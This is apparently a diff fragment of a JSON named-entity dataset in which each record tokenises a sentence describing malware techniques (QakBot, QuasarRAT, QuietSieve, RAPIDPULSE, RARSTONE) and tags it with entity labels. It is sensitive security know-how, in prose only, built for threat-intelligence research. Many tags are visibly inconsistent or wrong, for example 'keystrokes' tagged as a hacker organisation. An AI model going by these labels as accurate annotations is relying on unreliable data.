+ "has", + "been", + "delivered", + "in", + "ZIP", + "files", + "via", + "HTML", + "smuggling." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "QakBot", + "has", + "placed", + "its", + "payload", + "in", + "hidden", + "subdirectories." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "QakBot", + "can", + "make", + "small", + "changes", + "to", + "itself", + "in", + "order", + "to", + "change", + "its", + "checksum", + "and", + "hash", + "value." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "QakBot", + "has", + "the", + "ability", + "to", + "download", + "additional", + "components", + "and", + "malware." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "B-Features" + ] + }, + { + "tokens": [ + "QakBot", + "can", + "measure", + "the", + "download", + "speed", + "on", + "a", + "targeted", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "QakBot", + "web", + "inject", + "module", + "can", + "inject", + "Java", + "Script", + "into", + "web", + "banking", + "pages", + "visited", + "by", + "the", + "victim." + ], + "ner_tags": [ + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "QakBot", + "can", + "capture", + "keystrokes", + "on", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "QakBot", + "has", + "stored", + "stolen", + "emails", + "and", + "other", + "data", + "into", + "new", + "folders", + "prior", + "to", + "exfiltration." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "QakBot", + "can", + "target", + "and", + "steal", + "locally", + "stored", + "emails", + "to", + "support", + "thread", + "hijacking", + "phishing", + "campaigns." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Features", + "O", + "B-Features", + "I-Purp", + "I-Purp", + "I-Purp", + "O", + "O", + "O", + "O", + "B-Org", + "B-OffAct" + ] + }, + { + "tokens": [ + "QakBot", + "can", + "use", + "<code>net", + "localgroup</code>", + "to", + "enable", + "discovery", + "of", + "local", + "groups." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "QakBot", + "has", + "gained", + "execution", + "through", + "users", + "opening", + "malicious", + "attachments." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "QakBot", + "has", + "gained", + "execution", + "through", + "users", + "opening", + "malicious", + "links." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "QakBot", + "has", + "been", + "packaged", + "in", + "ISO", + "files", + "in", + "order", + "to", + "bypass", + "Mark", + "of", + "the", + "Web", + "(MOTW)", + "security", + "measures." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Purp", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "QakBot", + "payload", + "has", + "been", + "disguised", + "as", + "a", + "PNG", + "file", + "and", + "hidden", + "within", + "LNK", + "files", + "using", + "a", + "Microsoft", + "File", + "Explorer", + "icon." + ], + "ner_tags": [ + "O", + "B-Way", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "B-HackOrg", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Tool", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "QakBot", + "can", + "modify", + "the", + "Registry", + "to", + "store", + "its", + "configuration", + "information", + "in", + "a", + "randomly", + "named", + "subkey", + "under", + "<code>HKCU\\Software\\Microsoft</code>." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "QakBot", + "can", + "use", + "MSIExec", + "to", + "spawn", + "multiple", + "cmd.exe", + "processes." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "QakBot", + "can", + "use", + "<code>GetProcAddress</code>", + "to", + "help", + "delete", + "malicious", + "strings", + "from", + "memory." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "B-Features", + "B-Purp", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "QakBot", + "can", + "use", + "<code>net", + "share</code>", + "to", + "identify", + "network", + "shares", + "for", + "use", + "in", + "lateral", + "movement." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "QakBot", + "has", + "the", + "ability", + "use", + "TCP", + "to", + "send", + "or", + "receive", + "C2", + "packets." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "B-Features", + "O", + "O" + ] + }, + { + "tokens": [ + "QakBot", + "has", + "hidden", + "code", + "within", + "Excel", + "spreadsheets", + "by", + "turning", + "the", + "font", + "color", + "to", + "white", + "and", + "splitting", + "it", + "across", + "multiple", + "cells." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "QakBot", + "can", + "identify", + "peripheral", + "devices", + "on", + "targeted", + "systems." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "QakBot", + "can", + "use", + "PowerShell", + "to", + "download", + "and", + "execute", + "payloads." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "QakBot", + "has", + "the", + "ability", + "to", + "check", + "running", + "processes." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "QakBot", + "can", + "use", + "process", + "hollowing", + "to", + "execute", + "its", + "main", + "payload." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "QakBot", + "can", + "inject", + "itself", + "into", + "processes", + "including", + "explore.exe,", + "Iexplore.exe,", + "Mobsync.exe.,", + "and", + "wermgr.exe." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Way", + "I-Way", + "O", + "O", + "O", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "The", + "QakBot", + "proxy", + "module", + "can", + "encapsulate", + "SOCKS5", + "protocol", + "within", + "its", + "own", + "proxy", + "protocol." + ], + "ner_tags": [ + "O", + "B-Way", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "QakBot", + "can", + "maintain", + "persistence", + "by", + "creating", + "an", + "auto-run", + "Registry", + "key." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "QakBot", + "can", + "use", + "Regsvr32", + "to", + "execute", + "malicious", + "DLLs." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "QakBot", + "can", + "identify", + "remote", + "systems", + "through", + "the", + "<code>net", + "view</code>", + "command." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "QakBot", + "has", + "the", + "ability", + "to", + "use", + "removable", + "drives", + "to", + "spread", + "through", + "compromised", + "networks." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "B-Features", + "B-Purp", + "B-Features", + "O" + ] + }, + { + "tokens": [ + "QakBot", + "has", + "used", + "Rundll32.exe", + "to", + "drop", + "malicious", + "DLLs", + "including", + "Brute", + "Ratel", + "C4", + "and", + "to", + "enable", + "C2", + "communication." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "QakBot", + "has", + "the", + "ability", + "to", + "create", + "scheduled", + "tasks", + "for", + "persistence." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O" + ] + }, + { + "tokens": [ + "QakBot", + "can", + "identify", + "the", + "installed", + "antivirus", + "product", + "on", + "a", + "targeted", + "system." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "QakBot", + "can", + "enumerate", + "a", + "list", + "of", + "installed", + "programs." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Features", + "I-Features", + "I-Features", + "I-Features", + "O", + "O" + ] + }, + { + "tokens": [ + "QakBot", + "can", + "encrypt", + "and", + "pack", + "malicious", + "payloads." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "I-Features", + "B-HackOrg", + "O" + ] + }, + { + "tokens": [ + "QakBot", + "has", + "spread", + "through", + "emails", + "with", + "malicious", + "attachments." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "QakBot", + "has", + "spread", + "through", + "emails", + "with", + "malicious", + "links." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "QakBot", + "can", + "Base64", + "encode", + "system", + "information", + "sent", + "to", + "C2." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "QakBot", + "has", + "the", + "ability", + "to", + "capture", + "web", + "session", + "cookies." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "QakBot", + "can", + "RC4", + "encrypt", + "strings", + "in", + "C2", + "communication." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "QakBot", + "can", + "check", + "the", + "compromised", + "host", + "for", + "the", + "presence", + "of", + "multiple", + "executables", + "associated", + "with", + "analysis", + "tools", + "and", + "halt", + "execution", + "if", + "any", + "are", + "found." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "QakBot", + "can", + "collect", + "system", + "information", + "including", + "the", + "OS", + "version", + "and", + "domain", + "on", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "QakBot", + "can", + "use", + "<code>net", + "config", + "workstation</code>,", + "<code>arp", + "-a</code>,", + "`nslookup`,", + "and", + "<code>ipconfig", + "/all</code>", + "to", + "gather", + "network", + "configuration", + "information." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features" + ] + }, + { + "tokens": [ + "QakBot", + "can", + "use", + "<code>netstat</code>", + "to", + "enumerate", + "current", + "network", + "connections." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "QakBot", + "can", + "identify", + "the", + "user", + "name", + "on", + "a", + "compromised", + "system." + ], + "ner_tags": [ + "B-Way", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "QakBot", + "can", + "identify", + "the", + "system", + "time", + "on", + "a", + "targeted", + "host." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "QakBot", + "dropper", + "can", + "delay", + "dropping", + "the", + "payload", + "to", + "evade", + "detection." + ], + "ner_tags": [ + "O", + "B-SamFile", + "B-SecTeam", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "QakBot", + "can", + "use", + "VBS", + "to", + "download", + "and", + "execute", + "malicious", + "files." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "I-Features", + "B-HackOrg", + "B-Features" + ] + }, + { + "tokens": [ + "QakBot", + "has", + "the", + "ability", + "to", + "use", + "HTTP", + "and", + "HTTPS", + "in", + "communication", + "with", + "C2", + "servers." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "QakBot", + "can", + "use", + "cmd.exe", + "to", + "launch", + "itself", + "and", + "to", + "execute", + "multiple", + "C2", + "commands." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "QakBot", + "can", + "execute", + "WMI", + "queries", + "to", + "gather", + "information." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "I-Purp", + "O" + ] + }, + { + "tokens": [ + "QakBot", + "can", + "remotely", + "create", + "a", + "temporary", + "service", + "on", + "a", + "target", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "QuasarRAT", + "can", + "generate", + "a", + "UAC", + "pop-up", + "Window", + "to", + "prompt", + "the", + "target", + "user", + "to", + "run", + "a", + "command", + "as", + "the", + "administrator." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "A", + "QuasarRAT", + ".dll", + "file", + "is", + "digitally", + "signed", + "by", + "a", + "certificate", + "from", + "AirVPN." + ], + "ner_tags": [ + "O", + "B-SamFile", + "B-SamFile", + "I-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "QuasarRAT", + "can", + "obtain", + "passwords", + "from", + "FTP", + "clients." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "B-HackOrg", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "QuasarRAT", + "can", + "obtain", + "passwords", + "from", + "common", + "FTP", + "clients." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "QuasarRAT", + "can", + "obtain", + "passwords", + "from", + "common", + "web", + "browsers." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "QuasarRAT", + "can", + "retrieve", + "files", + "from", + "compromised", + "client", + "machines." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "QuasarRAT", + "has", + "the", + "ability", + "to", + "set", + "file", + "attributes", + "to", + "\"hidden\"", + "to", + "hide", + "files", + "from", + "the", + "compromised", + "user's", + "view", + "in", + "Windows", + "File", + "Explorer." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "QuasarRAT", + "can", + "hide", + "process", + "windows", + "and", + "make", + "web", + "requests", + "invisible", + "to", + "the", + "compromised", + "user.", + "Requests", + "marked", + "as", + "invisible", + "have", + "been", + "sent", + "with", + "user-agent", + "string", + "`Mozilla/5.0", + "(Macintosh;", + "Intel", + "Mac", + "OS", + "X", + "10_9_3)", + "AppleWebKit/537.75.14", + "(KHTML,", + "like", + "Gecko)", + "Version/7.0.3", + "Safari/7046A194A`", + "though", + "QuasarRAT", + "can", + "only", + "be", + "run", + "on", + "Windows", + "systems." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "QuasarRAT", + "can", + "download", + "files", + "to", + "the", + "victim’s", + "machine", + "and", + "execute", + "them." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "QuasarRAT", + "has", + "a", + "built-in", + "keylogger." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "QuasarRAT", + "has", + "a", + "command", + "to", + "edit", + "the", + "Registry", + "on", + "the", + "victim’s", + "machine." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "QuasarRAT", + "can", + "use", + "TCP", + "for", + "C2", + "communication." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "QuasarRAT", + "can", + "use", + "port", + "4782", + "on", + "the", + "compromised", + "host", + "for", + "TCP", + "callbacks." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "QuasarRAT", + "can", + "communicate", + "over", + "a", + "reverse", + "proxy", + "using", + "SOCKS5." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "If", + "the", + "QuasarRAT", + "client", + "process", + "does", + "not", + "have", + "administrator", + "privileges", + "it", + "will", + "add", + "a", + "registry", + "key", + "to", + "`HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run`", + "for", + "persistence." + ], + "ner_tags": [ + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "QuasarRAT", + "has", + "a", + "module", + "for", + "performing", + "remote", + "desktop", + "access." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "QuasarRAT", + "contains", + "a", + ".NET", + "wrapper", + "DLL", + "for", + "creating", + "and", + "managing", + "scheduled", + "tasks", + "for", + "maintaining", + "persistence", + "upon", + "reboot." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "B-SamFile", + "B-SecTeam", + "B-SecTeam", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "QuasarRAT", + "uses", + "AES", + "with", + "a", + "hardcoded", + "pre-shared", + "key", + "to", + "encrypt", + "network", + "communication." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features" + ] + }, + { + "tokens": [ + "QuasarRAT", + "can", + "gather", + "system", + "information", + "from", + "the", + "victim’s", + "machine", + "including", + "the", + "OS", + "type." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "QuasarRAT", + "can", + "determine", + "the", + "country", + "a", + "victim", + "host", + "is", + "located", + "in." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "QuasarRAT", + "has", + "the", + "ability", + "to", + "enumerate", + "the", + "Wide", + "Area", + "Network", + "(WAN)", + "IP", + "through", + "requests", + "to", + "ip-api[.]com,", + "freegeoip[.]net,", + "or", + "api[.]ipify[.]org", + "observed", + "with", + "user-agent", + "string", + "`Mozilla/5.0", + "(Windows", + "NT", + "6.3;", + "rv:48.0)", + "Gecko/20100101", + "Firefox/48.0`." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "QuasarRAT", + "can", + "enumerate", + "the", + "username", + "and", + "account", + "type." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "QuasarRAT", + "can", + "perform", + "webcam", + "viewing." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "QuasarRAT", + "can", + "launch", + "a", + "remote", + "shell", + "to", + "execute", + "commands", + "on", + "the", + "victim’s", + "machine." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "QuietSieve", + "can", + "collect", + "files", + "from", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "QuietSieve", + "can", + "search", + "files", + "on", + "the", + "target", + "host", + "by", + "extension,", + "including", + "doc,", + "docx,", + "xls,", + "rtf,", + "odt,", + "txt,", + "jpg,", + "pdf,", + "rar,", + "zip,", + "and", + "7z." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Way", + "B-Way", + "B-Way", + "B-Way", + "B-Way", + "B-Way", + "B-Way", + "B-Way", + "B-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "QuietSieve", + "has", + "the", + "ability", + "to", + "execute", + "payloads", + "in", + "a", + "hidden", + "window." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "QuietSieve", + "can", + "download", + "and", + "execute", + "payloads", + "on", + "a", + "target", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "QuietSieve", + "can", + "check", + "C2", + "connectivity", + "with", + "a", + "`ping`", + "to", + "8.8.8.8", + "(Google", + "public", + "DNS)." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "QuietSieve", + "can", + "identify", + "and", + "search", + "networked", + "drives", + "for", + "specific", + "file", + "name", + "extensions." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "QuietSieve", + "can", + "identify", + "and", + "search", + "removable", + "drives", + "for", + "specific", + "file", + "name", + "extensions." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "QuietSieve", + "has", + "taken", + "screenshots", + "every", + "five", + "minutes", + "and", + "saved", + "them", + "to", + "the", + "user's", + "local", + "Application", + "Data", + "folder", + "under", + "`Temp\\SymbolSourceSymbols\\icons`", + "or", + "`Temp\\ModeAuto\\icons`." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "QuietSieve", + "can", + "use", + "HTTPS", + "in", + "C2", + "communications." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RAPIDPULSE", + "retrieves", + "files", + "from", + "the", + "victim", + "system", + "via", + "encrypted", + "commands", + "sent", + "to", + "the", + "web", + "shell." + ], + "ner_tags": [ + "B-Way", + "B-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RAPIDPULSE", + "listens", + "for", + "specific", + "HTTP", + "query", + "parameters", + "in", + "received", + "communications.", + "If", + "specific", + "parameters", + "match,", + "a", + "hard-coded", + "RC4", + "key", + "is", + "used", + "to", + "decrypt", + "the", + "HTTP", + "query", + "paremter", + "<code>hmacTime</code>.", + "This", + "decrypts", + "to", + "a", + "filename", + "that", + "is", + "then", + "open,", + "read,", + "encrypted", + "with", + "the", + "same", + "RC4", + "key,", + "base64-encoded,", + "written", + "to", + "standard", + "out,", + "then", + "passed", + "as", + "a", + "response", + "to", + "the", + "HTTP", + "request." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RAPIDPULSE", + "has", + "the", + "ability", + "to", + "RC4", + "encrypt", + "and", + "base64", + "encode", + "decrypted", + "files", + "on", + "compromised", + "servers", + "prior", + "to", + "writing", + "them", + "to", + "stdout." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "B-Features", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RAPIDPULSE", + "is", + "a", + "web", + "shell", + "that", + "is", + "capable", + "of", + "arbitrary", + "file", + "read", + "on", + "targeted", + "web", + "servers", + "to", + "exfiltrate", + "items", + "of", + "interest", + "on", + "the", + "victim", + "device." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "After", + "decrypting", + "itself", + "in", + "memory,", + "RARSTONE", + "downloads", + "a", + "DLL", + "file", + "from", + "its", + "C2", + "server", + "and", + "loads", + "it", + "in", + "the", + "memory", + "space", + "of", + "a", + "hidden", + "Internet", + "Explorer", + "process.", + "This", + "“downloaded”", + "file", + "is", + "actually", + "not", + "dropped", + "onto", + "the", + "system." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-Features", + "O", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RARSTONE", + "obtains", + "installer", + "properties", + "from", + "Uninstall", + "Registry", + "Key", + "entries", + "to", + "obtain", + "information", + "about", + "installed", + "applications", + "and", + "how", + "to", + "uninstall", + "certain", + "applications." + ], + "ner_tags": [ + "B-Way", + "B-Features", + "B-HackOrg", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RARSTONE", + "downloads", + "its", + "backdoor", + "component", + "from", + "a", + "C2", + "server", + "and", + "loads", 